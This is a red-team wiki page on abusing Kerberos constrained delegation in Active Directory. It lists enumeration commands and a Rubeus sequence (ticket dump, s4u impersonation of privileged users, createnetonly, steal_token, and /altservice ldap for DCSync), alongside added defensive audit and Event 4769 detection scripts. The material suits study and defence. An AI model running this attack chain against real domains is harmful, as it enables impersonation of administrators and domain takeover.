Constrained Delegation - CraigDonkin/Infrastructure GitHub Wiki

Trust this computer for delegation to specified services only

  • Delegation allows a user or computer account to impersonate another account in order to access resources on its behalf.
  • You can restrict which services the user or computer may impersonate other accounts to. This is constrained delegation. If you don't use this option, it is unconstrained delegation.
  • For example, server A could be trusted to delegate to the CIFS service on server B. Server A could then impersonate any user to the CIFS service on server B.
  • Server A does not cache users' TGTs, but it can request a TGS on behalf of another user with its own TGT.
  • It is not possible to impersonate users whose account is marked "Account is sensitive and cannot be delegated" in AD.
  • From a red team perspective, if you compromise a machine with constrained delegation, you can impersonate any user to the service that is being delegated to.

Enumerate computers permitted for constrained delegation

  • PowerView:
    Get-DomainUser -TrustedToAuth
    Get-DomainComputer -TrustedToAuth
  • PowerShell:
    Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
  • ADSearch:
    ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes cn,dnshostname,samaccountname,msds-allowedtodelegateto --json
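The enumeration above lists the principals that hold delegation rights. As a defensive counterpart, here is an added audit script (my own example, not part of this wiki page) that reports the same accounts with their allowed target SPNs, notes whether protocol transition is enabled, and then lists privileged users who lack the "Account is sensitive and cannot be delegated" flag and are not in Protected Users, i.e. the users a compromised delegating host could impersonate. It assumes the ActiveDirectory (RSAT) module and a domain-joined session; the function names are mine.

```powershell
# Added example (not from the original page): audit constrained delegation and
# find privileged users that are still impersonable. Requires the ActiveDirectory module.
Import-Module ActiveDirectory

# userAccountControl bit values, as documented in the AD schema
$TRUSTED_FOR_DELEGATION         = 0x80000    # unconstrained delegation
$NOT_DELEGATED                  = 0x100000   # "Account is sensitive and cannot be delegated"
$TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition

function Get-ConstrainedDelegationReport {
    # Any user or computer with msDS-AllowedToDelegateTo populated is a
    # constrained-delegation principal; the SPNs in that attribute are the
    # services it may impersonate other accounts to.
    Get-ADObject -LDAPFilter '(msDS-AllowedToDelegateTo=*)' `
        -Properties sAMAccountName, userAccountControl, msDS-AllowedToDelegateTo |
    ForEach-Object {
        $uac = [int]$_.userAccountControl
        [pscustomobject]@{
            Account            = $_.sAMAccountName
            ObjectClass        = $_.ObjectClass
            # With protocol transition the principal can obtain tickets for users
            # who never authenticated to it with Kerberos (S4U2Self), which is
            # the riskier configuration.
            ProtocolTransition = [bool]($uac -band $TRUSTED_TO_AUTH_FOR_DELEGATION)
            Unconstrained      = [bool]($uac -band $TRUSTED_FOR_DELEGATION)
            AllowedTo          = ($_.'msDS-AllowedToDelegateTo' -join '; ')
        }
    }
}

function Get-UnprotectedPrivilegedAccounts {
    param([string[]]$Groups = @('Domain Admins', 'Enterprise Admins', 'Administrators'))
    # Members of privileged groups are the natural impersonation targets. The
    # NOT_DELEGATED flag the page mentions blocks delegation for an account, and
    # so does membership in the Protected Users group.
    $protected = @(Get-ADGroupMember -Identity 'Protected Users' -Recursive -ErrorAction SilentlyContinue |
                   Select-Object -ExpandProperty distinguishedName)
    $Groups | ForEach-Object { Get-ADGroupMember -Identity $_ -Recursive } |
        Where-Object { $_.objectClass -eq 'user' } |
        Sort-Object -Property distinguishedName -Unique |
        ForEach-Object {
            $u = Get-ADUser -Identity $_.distinguishedName -Properties userAccountControl
            $sensitive = [bool]($u.userAccountControl -band $NOT_DELEGATED)
            if (-not $sensitive -and ($protected -notcontains $u.DistinguishedName)) {
                [pscustomobject]@{
                    Account           = $u.SamAccountName
                    DistinguishedName = $u.DistinguishedName
                    Fix               = 'Set NOT_DELEGATED or add to Protected Users'
                }
            }
        }
}

Get-ConstrainedDelegationReport    | Format-Table -AutoSize
Get-UnprotectedPrivilegedAccounts  | Format-Table -AutoSize
```

Run it from a workstation with RSAT as a user allowed to read the directory. The first table is the review list for the delegation configuration itself (an unexpected SPN, or protocol transition where it is not needed, is the finding); the second table is the remediation list, since every account on it is impersonable by any host in the first table that is allowed to reach a service that user would use.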

Getting TGT

  • You need the TGT of the computer or user trusted for delegation.
  • With Rubeus, get the LUID of its logon session:
    Rubeus.exe triage
  • Then use dump to extract the ticket:
    Rubeus.exe dump /luid:<luid> /service:krbtgt /nowrap

Delegation with S4U and S4U2Proxy

  • You need to get a TGS for the service on the target.
  • You can target any user, but choose someone with high privileges.
    Rubeus.exe s4u /impersonateuser:<user to impersonate> /msdsspn:<SPN that the victim can delegate to> /user:<user or machine trusted for delegation> /ticket:<TGT for account in /user> /nowrap
  • Then pass the service ticket into a new logon session:
    Rubeus.exe createnetonly /program:<program to run> /domain:<domain> /user:<user you are impersonating> /password:<fake password> /ticket:<from S4U2Proxy>
  • Then steal the token to impersonate the user:
    steal_token <pid from createnetonly command>
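The S4U2Proxy step above is visible on the domain controller: the KDC logs Event 4769 for the resulting service ticket with the impersonated user in TargetUserName and the "Transited Services" field (XML data name TransmittedServices) populated, whereas a ticket requested by the user directly carries "-" there. The following detection logic is an added example of mine, not code from the wiki page; the sample events are constructed, and the function names and the privileged-user list are assumptions for illustration.

```powershell
# Added example (not from the original page): find S4U2Proxy ticket requests in
# DC Security logs and rate them by who was impersonated.

# Flatten a live 4769 record into the fields the detection needs.
function ConvertFrom-Event4769 {
    param([Parameter(ValueFromPipeline)] [System.Diagnostics.Eventing.Reader.EventRecord] $Event)
    process {
        $xml = [xml]$Event.ToXml()
        $d = @{}
        foreach ($n in $xml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        [pscustomobject]@{
            TimeCreated         = $Event.TimeCreated
            TargetUserName      = $d['TargetUserName']
            ServiceName         = $d['ServiceName']
            IpAddress           = $d['IpAddress']
            TransmittedServices = $d['TransmittedServices']
        }
    }
}

function Find-S4U2ProxyRequests {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [string[]] $PrivilegedUsers = @()
    )
    foreach ($e in $Events) {
        # "-" or empty means the user requested the ticket themselves; anything
        # else means the ticket was issued through S4U2Proxy delegation.
        if ([string]::IsNullOrEmpty($e.TransmittedServices) -or $e.TransmittedServices -eq '-') { continue }
        $user = $e.TargetUserName -replace '@.*$', ''   # strip the realm suffix
        [pscustomobject]@{
            TimeCreated      = $e.TimeCreated
            ImpersonatedUser = $user
            DelegatedVia     = $e.TransmittedServices   # SPN(s) of the delegating host
            TargetService    = $e.ServiceName           # SPN the ticket was issued for
            RequestingHost   = $e.IpAddress
            Severity         = if ($PrivilegedUsers -contains $user) { 'HIGH' } else { 'INFO' }
        }
    }
}

# Constructed sample: one ordinary TGS request, one delegated request for an admin.
$sample = @(
    [pscustomobject]@{ TimeCreated = '2024-01-01 09:00:00'; TargetUserName = 'alice@CORP.LOCAL';
                       ServiceName = 'cifs/fs01'; IpAddress = '10.0.0.21'; TransmittedServices = '-' },
    [pscustomobject]@{ TimeCreated = '2024-01-01 09:01:00'; TargetUserName = 'da_admin@CORP.LOCAL';
                       ServiceName = 'cifs/fs01'; IpAddress = '10.0.0.50';
                       TransmittedServices = 'http/web01.corp.local@CORP.LOCAL' }
)
Find-S4U2ProxyRequests -Events $sample -PrivilegedUsers @('da_admin') | Format-Table -AutoSize

# On a domain controller the same check runs over live events:
# $live = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4769 } | ConvertFrom-Event4769
# Find-S4U2ProxyRequests -Events $live -PrivilegedUsers @('da_admin')
```

Only the second sample event is reported, as HIGH, because the ticket for da_admin was issued through the web01 host rather than requested by da_admin. A useful baseline is to keep the set of (DelegatedVia, TargetService) pairs seen in normal operation and alert on any delegated request for a privileged user, which is exactly the case the s4u step above produces.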

Altservice

  • The SPN in a service ticket is not encrypted, so it can be changed using the /altservice option.
    Rubeus.exe s4u /impersonateuser:<user to be impersonated> /msdsspn:<SPN that /user can delegate to> /user:<user with delegation rights> /altservice:ldap /ticket:<TGT for /user>
  • A ticket for LDAP would allow a DCSync attack.